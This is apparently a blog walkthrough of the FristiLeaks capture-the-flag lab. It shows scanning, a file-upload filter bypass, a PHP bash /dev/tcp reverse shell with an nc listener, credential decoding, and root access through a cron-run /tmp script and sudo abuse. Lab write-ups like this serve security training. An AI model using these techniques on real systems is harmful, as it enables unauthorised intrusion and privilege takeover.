5 min readApr 1, 2021


  1. Network Discovery
nmap -sn

2.Port scan

nmap -Pn

There’s only port 80.

3. OS and service scan

nmap -A -p80

4. Vuln scan

nmap --script vuln -p80

5. Nikto scan

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi

7. Access HTTP site on port 80

View page source

Access robots.txt

Access /cola, /sisi, and /beer. All of them resulted in the same/similar page.

Viewing their page source didn't reveal anything.

Accessing /icons, not much revealed

Accessing /images, not much revealed

After googling, I found that sisi and fristi are also drinks

Let’s try accessing /fristi

There’s a login page

View page source, there’s possible username ‘eezeepz’

Scrolling down to the bottom, I found some comments indicating it’s a base64 string.

Decoding w/ cyberchef, I could not decode it because it is a png image.

I have to use another tool

Now I have an image of string.

Try using both of them to login

Login successful

8. Uploading file

I’ll upload the reverse shell script as shell.php

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

Prepare listener

rlwrap nc -lvp 1234

Cannot upload shell.php because it’s not an image file.

Change shell.php to shell.jpg

mv shell.php shell.jpg

Upload it

Access the shell.

Back to the listener, still no shell

Change shell.php to shell.php.jpg

cp shell.php shell.php.jpg

Access it again and now I have the shell.

9. Privilege escalation

Verify user


List username

cat /etc/passwd

Verify /etc/passwd permission

ls -la /etc/passwd

It belongs to root.

Verify /etc/shadow permission

ls -la /etc/shadow

It belongs to root.

Explore directories in machine

/home, I can access only eezeeps.

There’s notes.txt in /home/eezeepz

Read it

cat notes.txt

From the notes, there’re some programs that store in /home/admin

I will use /home/admin/chmod to create runthis file which will change the permission of /home/admin and store in /tmp.

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthiscd /tmpls -la

Wait for a while and access /home/admin

cd /home/adminls -la



It’s the script that run /tmp/runthis

Read cryptedpass.txt and whoisyourgodnow.txt

cat cryptedpass.txtcat whoisyourgodnow.txt

They look like encoded strings.

Read I think it’s an encoding script.

I copy the code and add decode function

def decodeString(str):
base64string = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(base64string)

Decode cat cryptedpass.txt and whoisyourgodnow.txt

Use them to login, starting w/ fristigod

su fristigod

Verify sudo

sudo -l

I can run this command w/ fristi.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bashwhoami

Now, I’m root.

cd /rootls -lacat fristileaks_secrets.txt



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